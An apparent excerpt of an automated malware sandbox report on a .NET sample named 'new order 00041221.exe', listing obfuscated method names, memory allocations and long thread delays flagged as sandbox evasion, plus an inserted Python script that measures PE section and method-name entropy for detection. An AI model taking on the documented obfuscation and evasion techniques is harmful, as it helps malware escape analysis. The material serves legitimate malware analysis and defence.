                    Source: 1.2.new order 00041221.exe.3bd3aa0.4.raw.unpack, WWoXcRNneectu4WPwU.cs | High entropy of concatenated method names: 'RKxXTaU8XU', 'O4fXpM9MLJ', 'JZQXK2uKPD', 'mq2XA3gDqd', 'kmHXM5uq7j', 'pN6XgcqyJ0', 'XptXBdQ7MW', 'Tf1X21wsy0', 'CygX3yV0An', 'aH8XHyXNT5'
                    Source: 1.2.new order 00041221.exe.3bd3aa0.4.raw.unpack, roTOmjLT5gBK2EC4ca.cs | High entropy of concatenated method names: 'TnNcydYa2J', 'dDScniRR6g', 'uifcX6rF3s', 'nvTc17deCr', 'go7cFXNGOO', 'aeFcqE6AOX', 'p1GcdwLXIJ', 'q2WcLOinJS', 'M45cvlLUBX', 'vmHc6aeHeH'
                    Source: 1.2.new order 00041221.exe.3bd3aa0.4.raw.unpack, oea08sDOxeGOQEPJMl.cs | High entropy of concatenated method names: 'cZi1UD1duR', 'Ts41mieuZQ', 'wtU1NFkZUI', 'iH71D659No', 'VnX19UvdC9', 'F9g1btumD8', 'Q6S1Ig8Mgq', 'H9t14PxF4A', 'cAt18gNNot', 'p6B1ZflOJY'
                    Source: 1.2.new order 00041221.exe.3bd3aa0.4.raw.unpack, XmPheVJY4ysEIwXRAO.cs | High entropy of concatenated method names: 'CgOYNhHAP8', 'uRcYDFv0kY', 'L3KYCgYnO6', 'JhPYaQEUk1', 'LSDYhTMLv0', 'rnxYtRxO1p', 'Qy7YuRNx2J', 'dHDYl1xcid', 'vO6YG442JZ', 'tDbY7BPaeV'
                    Source: 1.2.new order 00041221.exe.3bd3aa0.4.raw.unpack, mbWDZh1fAEZLVbsgfE.cs | High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'jw8E31Gaa6', 'nnVEHVEl9N', 'ndFEzAoAJN', 'paKcVOD7yC', 'j4acQh4pQv', 'tkRcEw5qPq', 'Nk6cc7I2M9', 'pyCWuszn5xgZTgfnr4'
                    Source: 1.2.new order 00041221.exe.3bd3aa0.4.raw.unpack, I7YwgKocvwlhG6qbjf.cs | High entropy of concatenated method names: 'wdWdOkt4Ps', 'BamdjKUSML', 'eVCdwilZeg', 'mSHdUjUfqC', 'iCSdxYoDsc', 'aehdmNBA7r', 'am5dR4ucNm', 'F5tdNOlLFZ', 'W1LdDeFOWc', 'G3idWcUSLB'
                    Source: 1.2.new order 00041221.exe.3bd3aa0.4.raw.unpack, PIIQJlCPLLSpQvTcKh.cs | High entropy of concatenated method names: 'b4GqyFWMdu', 'AfAqX6BqTP', 'ONFqFuTCFb', 'cCHqdTZVgh', 'eMVqLEAHQ3', 'iSpFMvLFvV', 'R9RFgeiQ7D', 'D7NFBRGC3o', 'vO1F2beHyp', 'CcWF3y8wEN'
                    Source: 1.2.new order 00041221.exe.3bd3aa0.4.raw.unpack, GYgZrNuv1RLjrByTBp.cs | High entropy of concatenated method names: 'iuwdnHRsSL', 'QSMd1F3EnS', 'KJddqi2bQf', 'lwKqHsatdr', 'XY8qzqC01e', 'lu0dV442ey', 'of0dQ67e9b', 'GnEdEGwfuG', 'gk2dcRFu0Z', 'pKvdPIspOA'
                    Source: 1.2.new order 00041221.exe.3bd3aa0.4.raw.unpack, hoHp1pQctWiW4gDnx50.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'tsAZTNw5uf', 'uYcZpVy21l', 'n6aZKsjMAm', 'GDwZAyOhkQ', 'WoaZMv3tJE', 'gutZgOrcEU', 'BvsZBefRFc'
                    Source: 1.2.new order 00041221.exe.3bd3aa0.4.raw.unpack, EOaFyVT7LVLL2nf3aa.cs | High entropy of concatenated method names: 'QKq9GO9fTr', 'gyD9i53UBx', 'p2P9TW5cah', 'gms9pywHhM', 'dLy9am6YKj', 'Wnr9sI7qFF', 'x8A9hHXUN5', 't6m9tsNGWd', 'QGQ9eMPTLG', 'rti9upkk4l'
                    Source: 1.2.new order 00041221.exe.3bd3aa0.4.raw.unpack, AqI0NT2diOTHy7sR0b.cs | High entropy of concatenated method names: 'tuV4nyOFRM', 'y6F4Xp7hNv', 'bmD41et1gl', 'UIY4FicyPl', 'TGo4q7HxGK', 'bQs4dAEteO', 'Yf14LiYr7Z', 'Dxn4vQZICO', 'dLt46E79RC', 'JoG4r6bHYo'
                    Source: 1.2.new order 00041221.exe.3bd3aa0.4.raw.unpack, GXXJusPBLvRYKwa80t.cs | High entropy of concatenated method names: 'R32QdWoXcR', 'feeQLctu4W', 'HOxQ6eGOQE', 'eJMQrlq8D6', 'WsSQ90ZiII', 'bJlQbPLLSp', 'NnsoucCHxhjAwZMhmt', 'YGMTVDOjmS5iXELVeW', 'dmmQQah407', 'SgrQc2WkMG'
                    Source: 1.2.new order 00041221.exe.3bd3aa0.4.raw.unpack, UNqWbw3JDl6LusN8wK.cs | High entropy of concatenated method names: 'Kjx4CvxSgn', 'ypk4aUWCm1', 'mlS4suMWec', 'dNl4h5XYDT', 'avw4T5rcsq', 'MqE4t5ZWy0', 'Next', 'Next', 'Next', 'NextBytes'
                    Source: 1.2.new order 00041221.exe.3bd3aa0.4.raw.unpack, DsmWQqH9ImqBkLuxMX.cs | High entropy of concatenated method names: 's9l8QCne5F', 'tjm8cvEgBE', 'DKB8PFkg0y', 'nwv8nxfSyE', 'LY88Xj82vM', 'zPt8FCqvDF', 'FIp8qBvDyt', 'bcB4BXeTTW', 'NR4421EPwJ', 'PLL434vFq2'
                    Source: 1.2.new order 00041221.exe.3bd3aa0.4.raw.unpack, bdkeCrEVO5b4aL692H.cs | High entropy of concatenated method names: 'I8EwZfp6c', 'pUJU8T80o', 'AadmniBuO', 't2cR03kQc', 'oTVDWbFOM', 'ItkWLWrx1', 'X6e2a2abtuTE5Bm115', 'bcVhaRQTvD5v2RDGdp', 'U314W1CEr', 'oCHZooEr4'
                    Source: 1.2.new order 00041221.exe.3bd3aa0.4.raw.unpack, P6MW4SQV1ZS9x9j2kD1.cs | High entropy of concatenated method names: 'XQK8OFv8Gd', 'vXR8jmwba6', 'SIS8wCjfnD', 'aVL8UZhaRv', 'Epq8x4uoDE', 'P0U8meJxAG', 'y288RW4Hr9', 'Ard8NsxcSb', 'HLs8DQc3WI', 'bdq8WFJSKe'
                    Source: 1.2.new order 00041221.exe.3bd3aa0.4.raw.unpack, GO6JcJXsuV8AKf3A4i.cs | High entropy of concatenated method names: 'Dispose', 'bcRQ3ZkbIi', 'OMxEaZsbQ7', 'cNqUUWQuGV', 'nUqQHI0NTd', 'POTQzHy7sR', 'ProcessDialogKey', 'wbMEVNqWbw', 'QDlEQ6LusN', 'rwKEENsmWQ'
                    Source: 1.2.new order 00041221.exe.3bd3aa0.4.raw.unpack, i8D6JcW7rn00w2sS0Z.cs | High entropy of concatenated method names: 'Qd6Fx6BdST', 'cFgFR2Zn1M', 'BLd1s1n3JR', 'qKK1hqcd29', 'gh31tEIYRV', 'aug1eNL3oL', 'Sle1u2sA8l', 'TwD1lvAuXd', 'DYh1oHpr3v', 'lEU1GAIYf2'
                    Source: 1.2.new order 00041221.exe.3c588c0.1.raw.unpack, WEkErVgJn1PjkdRbDK.cs | High entropy of concatenated method names: 'ksnI2GS1Sg', 'VnxIHA1l58', 't0a4VAcCPY', 'oQ84QADq3w', 'eI3I7WmpKy', 'EJuIi4Zvbw', 'fmqIJplq0r', 'h5TIThviGG', 'UvbIp8eT3v', 'EsqIKrXUbo'
                    Source: 1.2.new order 00041221.exe.3c588c0.1.raw.unpack, WWoXcRNneectu4WPwU.cs | High entropy of concatenated method names: 'RKxXTaU8XU', 'O4fXpM9MLJ', 'JZQXK2uKPD', 'mq2XA3gDqd', 'kmHXM5uq7j', 'pN6XgcqyJ0', 'XptXBdQ7MW', 'Tf1X21wsy0', 'CygX3yV0An', 'aH8XHyXNT5'
                    Source: 1.2.new order 00041221.exe.3c588c0.1.raw.unpack, roTOmjLT5gBK2EC4ca.cs | High entropy of concatenated method names: 'TnNcydYa2J', 'dDScniRR6g', 'uifcX6rF3s', 'nvTc17deCr', 'go7cFXNGOO', 'aeFcqE6AOX', 'p1GcdwLXIJ', 'q2WcLOinJS', 'M45cvlLUBX', 'vmHc6aeHeH'
                    Source: 1.2.new order 00041221.exe.3c588c0.1.raw.unpack, oea08sDOxeGOQEPJMl.cs | High entropy of concatenated method names: 'cZi1UD1duR', 'Ts41mieuZQ', 'wtU1NFkZUI', 'iH71D659No', 'VnX19UvdC9', 'F9g1btumD8', 'Q6S1Ig8Mgq', 'H9t14PxF4A', 'cAt18gNNot', 'p6B1ZflOJY'
                    Source: 1.2.new order 00041221.exe.3c588c0.1.raw.unpack, XmPheVJY4ysEIwXRAO.cs | High entropy of concatenated method names: 'CgOYNhHAP8', 'uRcYDFv0kY', 'L3KYCgYnO6', 'JhPYaQEUk1', 'LSDYhTMLv0', 'rnxYtRxO1p', 'Qy7YuRNx2J', 'dHDYl1xcid', 'vO6YG442JZ', 'tDbY7BPaeV'
                    Source: 1.2.new order 00041221.exe.3c588c0.1.raw.unpack, mbWDZh1fAEZLVbsgfE.cs | High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'jw8E31Gaa6', 'nnVEHVEl9N', 'ndFEzAoAJN', 'paKcVOD7yC', 'j4acQh4pQv', 'tkRcEw5qPq', 'Nk6cc7I2M9', 'pyCWuszn5xgZTgfnr4'
                    Source: 1.2.new order 00041221.exe.3c588c0.1.raw.unpack, I7YwgKocvwlhG6qbjf.cs | High entropy of concatenated method names: 'wdWdOkt4Ps', 'BamdjKUSML', 'eVCdwilZeg', 'mSHdUjUfqC', 'iCSdxYoDsc', 'aehdmNBA7r', 'am5dR4ucNm', 'F5tdNOlLFZ', 'W1LdDeFOWc', 'G3idWcUSLB'
                    Source: 1.2.new order 00041221.exe.3c588c0.1.raw.unpack, PIIQJlCPLLSpQvTcKh.cs | High entropy of concatenated method names: 'b4GqyFWMdu', 'AfAqX6BqTP', 'ONFqFuTCFb', 'cCHqdTZVgh', 'eMVqLEAHQ3', 'iSpFMvLFvV', 'R9RFgeiQ7D', 'D7NFBRGC3o', 'vO1F2beHyp', 'CcWF3y8wEN'
                    Source: 1.2.new order 00041221.exe.3c588c0.1.raw.unpack, GYgZrNuv1RLjrByTBp.cs | High entropy of concatenated method names: 'iuwdnHRsSL', 'QSMd1F3EnS', 'KJddqi2bQf', 'lwKqHsatdr', 'XY8qzqC01e', 'lu0dV442ey', 'of0dQ67e9b', 'GnEdEGwfuG', 'gk2dcRFu0Z', 'pKvdPIspOA'
                    Source: 1.2.new order 00041221.exe.3c588c0.1.raw.unpack, hoHp1pQctWiW4gDnx50.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'tsAZTNw5uf', 'uYcZpVy21l', 'n6aZKsjMAm', 'GDwZAyOhkQ', 'WoaZMv3tJE', 'gutZgOrcEU', 'BvsZBefRFc'
                    Source: 1.2.new order 00041221.exe.3c588c0.1.raw.unpack, EOaFyVT7LVLL2nf3aa.cs | High entropy of concatenated method names: 'QKq9GO9fTr', 'gyD9i53UBx', 'p2P9TW5cah', 'gms9pywHhM', 'dLy9am6YKj', 'Wnr9sI7qFF', 'x8A9hHXUN5', 't6m9tsNGWd', 'QGQ9eMPTLG', 'rti9upkk4l'
                    Source: 1.2.new order 00041221.exe.3c588c0.1.raw.unpack, AqI0NT2diOTHy7sR0b.cs | High entropy of concatenated method names: 'tuV4nyOFRM', 'y6F4Xp7hNv', 'bmD41et1gl', 'UIY4FicyPl', 'TGo4q7HxGK', 'bQs4dAEteO', 'Yf14LiYr7Z', 'Dxn4vQZICO', 'dLt46E79RC', 'JoG4r6bHYo'
                    Source: 1.2.new order 00041221.exe.3c588c0.1.raw.unpack, GXXJusPBLvRYKwa80t.cs | High entropy of concatenated method names: 'R32QdWoXcR', 'feeQLctu4W', 'HOxQ6eGOQE', 'eJMQrlq8D6', 'WsSQ90ZiII', 'bJlQbPLLSp', 'NnsoucCHxhjAwZMhmt', 'YGMTVDOjmS5iXELVeW', 'dmmQQah407', 'SgrQc2WkMG'
                    Source: 1.2.new order 00041221.exe.3c588c0.1.raw.unpack, UNqWbw3JDl6LusN8wK.cs | High entropy of concatenated method names: 'Kjx4CvxSgn', 'ypk4aUWCm1', 'mlS4suMWec', 'dNl4h5XYDT', 'avw4T5rcsq', 'MqE4t5ZWy0', 'Next', 'Next', 'Next', 'NextBytes'
                    Source: 1.2.new order 00041221.exe.3c588c0.1.raw.unpack, DsmWQqH9ImqBkLuxMX.cs | High entropy of concatenated method names: 's9l8QCne5F', 'tjm8cvEgBE', 'DKB8PFkg0y', 'nwv8nxfSyE', 'LY88Xj82vM', 'zPt8FCqvDF', 'FIp8qBvDyt', 'bcB4BXeTTW', 'NR4421EPwJ', 'PLL434vFq2'
                    Source: 1.2.new order 00041221.exe.3c588c0.1.raw.unpack, bdkeCrEVO5b4aL692H.cs | High entropy of concatenated method names: 'I8EwZfp6c', 'pUJU8T80o', 'AadmniBuO', 't2cR03kQc', 'oTVDWbFOM', 'ItkWLWrx1', 'X6e2a2abtuTE5Bm115', 'bcVhaRQTvD5v2RDGdp', 'U314W1CEr', 'oCHZooEr4'
                    Source: 1.2.new order 00041221.exe.3c588c0.1.raw.unpack, P6MW4SQV1ZS9x9j2kD1.cs | High entropy of concatenated method names: 'XQK8OFv8Gd', 'vXR8jmwba6', 'SIS8wCjfnD', 'aVL8UZhaRv', 'Epq8x4uoDE', 'P0U8meJxAG', 'y288RW4Hr9', 'Ard8NsxcSb', 'HLs8DQc3WI', 'bdq8WFJSKe'
                    Source: 1.2.new order 00041221.exe.3c588c0.1.raw.unpack, GO6JcJXsuV8AKf3A4i.cs | High entropy of concatenated method names: 'Dispose', 'bcRQ3ZkbIi', 'OMxEaZsbQ7', 'cNqUUWQuGV', 'nUqQHI0NTd', 'POTQzHy7sR', 'ProcessDialogKey', 'wbMEVNqWbw', 'QDlEQ6LusN', 'rwKEENsmWQ'
                    Source: 1.2.new order 00041221.exe.3c588c0.1.raw.unpack, i8D6JcW7rn00w2sS0Z.cs | High entropy of concatenated method names: 'Qd6Fx6BdST', 'cFgFR2Zn1M', 'BLd1s1n3JR', 'qKK1hqcd29', 'gh31tEIYRV', 'aug1eNL3oL', 'Sle1u2sA8l', 'TwD1lvAuXd', 'DYh1oHpr3v', 'lEU1GAIYf2'
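The obfuscation findings above rest on three measurable signals: reflective loading through System.Reflection.Assembly.Load(byte[]), a .text section whose entropy is 7.87 bits per byte, and method names that look random. The Python below is an added example, not Joe Sandbox's code; it reproduces two of those measurements with the standard library only: Shannon entropy per PE section read from the section table, and the entropy of concatenated method names, computed for the names quoted in the report against a set of ordinary .NET names. The PE image it parses is constructed inline as test input, and the 4.8 name-entropy threshold is this example's assumption rather than the sandbox's cut-off. One caveat for triage: commercial .NET protectors produce the same reflective-loading and entropy signals, so these indicators corroborate the behavioural findings in the report rather than replace them.

```python
"""Per-section PE entropy and .NET method-name entropy, the two static measures
behind the "Data Obfuscation" findings above. Added example, not Joe Sandbox
code. The PE image below is constructed as test input; the threshold is an
assumption of this example."""
import hashlib
import math
import struct
from collections import Counter


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for a constant buffer, 8.0 for a uniform one."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def pe_section_entropies(pe: bytes) -> dict:
    """Walk the PE section table and return {section_name: entropy}."""
    if pe[:2] != b"MZ":
        raise ValueError("not a PE image: missing MZ header")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE image: missing PE signature")
    coff = e_lfanew + 4                                   # IMAGE_FILE_HEADER
    num_sections = struct.unpack_from("<H", pe, coff + 2)[0]
    opt_size = struct.unpack_from("<H", pe, coff + 16)[0]  # SizeOfOptionalHeader
    table = coff + 20 + opt_size                          # first IMAGE_SECTION_HEADER
    result = {}
    for i in range(num_sections):
        hdr = table + 40 * i
        name = pe[hdr:hdr + 8].rstrip(b"\0").decode("ascii", "replace")
        raw_size, raw_ptr = struct.unpack_from("<II", pe, hdr + 16)
        result[name] = shannon_entropy(pe[raw_ptr:raw_ptr + raw_size])
    return result


# Method names quoted verbatim from the report, and ordinary .NET names for comparison.
OBFUSCATED_NAMES = ['ksnI2GS1Sg', 'VnxIHA1l58', 't0a4VAcCPY', 'oQ84QADq3w', 'eI3I7WmpKy',
                    'EJuIi4Zvbw', 'fmqIJplq0r', 'h5TIThviGG', 'UvbIp8eT3v', 'EsqIKrXUbo']
READABLE_NAMES = ['EditValue', 'GetEditStyle', 'CanConvertFrom', 'ConvertFrom', 'ConvertTo',
                  'Dispose', 'ProcessDialogKey', 'Next', 'NextBytes']
NAME_ENTROPY_THRESHOLD = 4.8   # assumption of this example, not Joe Sandbox's cut-off


def method_name_entropy(names) -> float:
    """Entropy of all method names of one type joined together, as the report measures it."""
    return shannon_entropy("".join(names).encode("ascii", "replace"))


def looks_obfuscated(names, threshold: float = NAME_ENTROPY_THRESHOLD) -> bool:
    return method_name_entropy(names) > threshold


def _pseudo_random(n: int, seed: bytes = b"constructed test input") -> bytes:
    """Deterministic high-entropy filler (a SHA-256 chain) standing in for packed code."""
    out, block = bytearray(), seed
    while len(out) < n:
        block = hashlib.sha256(block).digest()
        out += block
    return bytes(out[:n])


def build_constructed_pe() -> bytes:
    """A minimal, non-executable two-section PE image constructed purely as test input:
    a high-entropy .text (stand-in for packed code) and a low-entropy .rsrc."""
    text = _pseudo_random(4096)
    rsrc = b"A" * 1024 + b"B" * 512
    text_ptr = 0x200
    rsrc_ptr = text_ptr + len(text)
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)            # e_lfanew at offset 0x3C
    coff = struct.pack("<HHIIIHH", 0x14C, 2, 0, 0, 0, 0, 0x0102)  # 2 sections, no optional header

    def section(name: bytes, size: int, ptr: int, flags: int) -> bytes:
        # Name, VirtualSize, VirtualAddress, SizeOfRawData, PointerToRawData,
        # PointerToRelocations, PointerToLinenumbers, NumberOfRelocations,
        # NumberOfLinenumbers, Characteristics
        return struct.pack("<8sIIIIIIHHI", name, size, 0x1000, size, ptr, 0, 0, 0, 0, flags)

    header = (dos + b"PE\0\0" + coff
              + section(b".text", len(text), text_ptr, 0x60000020)   # CODE|EXECUTE|READ, as in the report
              + section(b".rsrc", len(rsrc), rsrc_ptr, 0x40000040))  # INITIALIZED_DATA|READ
    return header.ljust(text_ptr, b"\0") + text + rsrc


if __name__ == "__main__":
    for name, ent in pe_section_entropies(build_constructed_pe()).items():
        print(f"{name:8s} entropy {ent:.3f}")
    for label, names in (("obfuscated", OBFUSCATED_NAMES), ("readable", READABLE_NAMES)):
        print(f"{label}: {method_name_entropy(names):.2f} bits/char, flagged={looks_obfuscated(names)}")
```

To run it against a real sample, replace build_constructed_pe() with the file's bytes; a packed or encrypted .text will sit near 8.0, as the report's 7.87 does, while ordinary compiled .NET IL usually measures well below that.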
                    Source: C:\Users\user\Desktop\new order 00041221.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                    Source: C:\Users\user\Desktop\new order 00041221.exe | Process information set: NOOPENFILEERRORBOX (98 identical entries)

                    Malware Analysis System Evasion

                    Source: Yara match -- File source: Process Memory Space: new order 00041221.exe PID: 1000, type: MEMORYSTR
                    Source: C:\Users\user\Desktop\new order 00041221.exe -- Memory allocated: B50000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\new order 00041221.exe -- Memory allocated: 2850000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\new order 00041221.exe -- Memory allocated: 2580000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\new order 00041221.exe -- Memory allocated: 6D40000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\new order 00041221.exe -- Memory allocated: 7D40000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\new order 00041221.exe -- Memory allocated: 7FC0000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\new order 00041221.exe -- Memory allocated: 8FC0000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\new order 00041221.exe -- Memory allocated: 1270000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\new order 00041221.exe -- Memory allocated: 2EE0000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\new order 00041221.exe -- Memory allocated: 2DC0000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\new order 00041221.exe -- Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\Desktop\new order 00041221.exe -- Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\Desktop\new order 00041221.exe -- Thread delayed: delay time: 600000
                    Source: C:\Users\user\Desktop\new order 00041221.exe -- Thread delayed: delay time: 599875
                    Source: C:\Users\user\Desktop\new order 00041221.exe -- Thread delayed: delay time: 599766
                    Source: C:\Users\user\Desktop\new order 00041221.exe -- Thread delayed: delay time: 599656
                    Source: C:\Users\user\Desktop\new order 00041221.exe -- Thread delayed: delay time: 599546
                    Source: C:\Users\user\Desktop\new order 00041221.exe -- Thread delayed: delay time: 599437
                    Source: C:\Users\user\Desktop\new order 00041221.exe -- Thread delayed: delay time: 599328
                    Source: C:\Users\user\Desktop\new order 00041221.exe -- Thread delayed: delay time: 599218
                    Source: C:\Users\user\Desktop\new order 00041221.exe -- Thread delayed: delay time: 599109
                    Source: C:\Users\user\Desktop\new order 00041221.exe -- Thread delayed: delay time: 599000
                    Source: C:\Users\user\Desktop\new order 00041221.exe -- Thread delayed: delay time: 598890
                    Source: C:\Users\user\Desktop\new order 00041221.exe -- Thread delayed: delay time: 598781
                    Source: C:\Users\user\Desktop\new order 00041221.exe -- Thread delayed: delay time: 598672
                    Source: C:\Users\user\Desktop\new order 00041221.exe -- Thread delayed: delay time: 598562
                    Source: C:\Users\user\Desktop\new order 00041221.exe -- Thread delayed: delay time: 598461
                    Source: C:\Users\user\Desktop\new order 00041221.exe -- Thread delayed: delay time: 598344
                    Source: C:\Users\user\Desktop\new order 00041221.exe -- Thread delayed: delay time: 598234
                    Source: C:\Users\user\Desktop\new order 00041221.exe -- Thread delayed: delay time: 598125
                    Source: C:\Users\user\Desktop\new order 00041221.exe -- Thread delayed: delay time: 598016
                    Source: C:\Users\user\Desktop\new order 00041221.exe -- Thread delayed: delay time: 597906
                    Source: C:\Users\user\Desktop\new order 00041221.exe -- Thread delayed: delay time: 597797
                    Source: C:\Users\user\Desktop\new order 00041221.exe -- Thread delayed: delay time: 597687
                    Source: C:\Users\user\Desktop\new order 00041221.exe -- Thread delayed: delay time: 597569
                    Source: C:\Users\user\Desktop\new order 00041221.exe -- Thread delayed: delay time: 597447
                    Source: C:\Users\user\Desktop\new order 00041221.exe -- Thread delayed: delay time: 597336
                    Source: C:\Users\user\Desktop\new order 00041221.exe -- Thread delayed: delay time: 597219
                    Source: C:\Users\user\Desktop\new order 00041221.exe -- Thread delayed: delay time: 597094
                    Source: C:\Users\user\Desktop\new order 00041221.exe -- Thread delayed: delay time: 596961
                    Source: C:\Users\user\Desktop\new order 00041221.exe -- Thread delayed: delay time: 596823
                    Source: C:\Users\user\Desktop\new order 00041221.exe -- Thread delayed: delay time: 596703
                    Source: C:\Users\user\Desktop\new order 00041221.exe -- Thread delayed: delay time: 596588
                    Source: C:\Users\user\Desktop\new order 00041221.exe -- Thread delayed: delay time: 596469
                    Source: C:\Users\user\Desktop\new order 00041221.exe -- Thread delayed: delay time: 596318
                    Source: C:\Users\user\Desktop\new order 00041221.exe -- Thread delayed: delay time: 596165
                    Source: C:\Users\user\Desktop\new order 00041221.exe -- Thread delayed: delay time: 595844
                    Source: C:\Users\user\Desktop\new order 00041221.exe -- Thread delayed: delay time: 595653
                    Source: C:\Users\user\Desktop\new order 00041221.exe -- Thread delayed: delay time: 595547
                    Source: C:\Users\user\Desktop\new order 00041221.exe -- Thread delayed: delay time: 595433
                    Source: C:\Users\user\Desktop\new order 00041221.exe -- Thread delayed: delay time: 595313
                    Source: C:\Users\user\Desktop\new order 00041221.exe -- Thread delayed: delay time: 595188
                    Source: C:\Users\user\Desktop\new order 00041221.exe -- Thread delayed: delay time: 595063
                    Source: C:\Users\user\Desktop\new order 00041221.exe -- Thread delayed: delay time: 594938
                    Source: C:\Users\user\Desktop\new order 00041221.exe -- Thread delayed: delay time: 594828
                    Source: C:\Users\user\Desktop\new order 00041221.exe -- Thread delayed: delay time: 594719
                    Source: C:\Users\user\Desktop\new order 00041221.exe -- Thread delayed: delay time: 594594
                    Source: C:\Users\user\Desktop\new order 00041221.exe -- Thread delayed: delay time: 594484
                    Source: C:\Users\user\Desktop\new order 00041221.exe -- Thread delayed: delay time: 594374
                    Source: C:\Users\user\Desktop\new order 00041221.exe -- Thread delayed: delay time: 594266
                    Source: C:\Users\user\Desktop\new order 00041221.exe -- Thread delayed: delay time: 594156
                    Source: C:\Users\user\Desktop\new order 00041221.exe -- Thread delayed: delay time: 594047
                    Source: C:\Users\user\Desktop\new order 00041221.exe -- Thread delayed: delay time: 593937
                    Source: C:\Users\user\Desktop\new order 00041221.exe -- Thread delayed: delay time: 593828
                    Source: C:\Users\user\Desktop\new order 00041221.exe -- Window / User API: threadDelayed 7356
                    Source: C:\Users\user\Desktop\new order 00041221.exe -- Window / User API: threadDelayed 2473
                    Source: C:\Users\user\Desktop\new order 00041221.exe TID: 4296 -- Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7380 -- Thread sleep count: 37 > 30
                    Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7380 -- Thread sleep time: -34126476536362649s >= -30000s
                    Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7380 -- Thread sleep time: -600000s >= -30000s
                    Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7380 -- Thread sleep time: -599875s >= -30000s
                    Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7388 -- Thread sleep count: 7356 > 30
                    Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7388 -- Thread sleep count: 2473 > 30
                    Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7380 -- Thread sleep time: -599766s >= -30000s
                    Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7380 -- Thread sleep time: -599656s >= -30000s
                    Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7380 -- Thread sleep time: -599546s >= -30000s
                    Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7380 -- Thread sleep time: -599437s >= -30000s
                    Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7380 -- Thread sleep time: -599328s >= -30000s
                    Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7380 -- Thread sleep time: -599218s >= -30000s
                    Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7380 -- Thread sleep time: -599109s >= -30000s
                    Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7380 -- Thread sleep time: -599000s >= -30000s
                    Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7380 -- Thread sleep time: -598890s >= -30000s
                    Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7380 -- Thread sleep time: -598781s >= -30000s
                    Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7380 -- Thread sleep time: -598672s >= -30000s
                    Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7380 -- Thread sleep time: -598562s >= -30000s
                    Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7380 -- Thread sleep time: -598461s >= -30000s
                    Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7380 -- Thread sleep time: -598344s >= -30000s
                    Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7380 -- Thread sleep time: -598234s >= -30000s
                    Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7380 -- Thread sleep time: -598125s >= -30000s
                    Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7380 -- Thread sleep time: -598016s >= -30000s
                    Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7380 -- Thread sleep time: -597906s >= -30000s
                    Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7380 -- Thread sleep time: -597797s >= -30000s
                    Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7380 -- Thread sleep time: -597687s >= -30000s
                    Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7380 -- Thread sleep time: -597569s >= -30000s
                    Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7380 -- Thread sleep time: -597447s >= -30000s
                    Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7380 -- Thread sleep time: -597336s >= -30000s
                    Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7380 -- Thread sleep time: -597219s >= -30000s
                    Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7380 -- Thread sleep time: -597094s >= -30000s
                    Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7380 -- Thread sleep time: -596961s >= -30000s
                    Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7380 -- Thread sleep time: -596823s >= -30000s
                    Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7380 -- Thread sleep time: -596703s >= -30000s
                    Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7380 -- Thread sleep time: -596588s >= -30000s
                    Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7380 -- Thread sleep time: -596469s >= -30000s
                    Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7380 -- Thread sleep time: -596318s >= -30000s
                    Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7380 -- Thread sleep time: -596165s >= -30000s
                    Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7380 -- Thread sleep time: -595844s >= -30000s
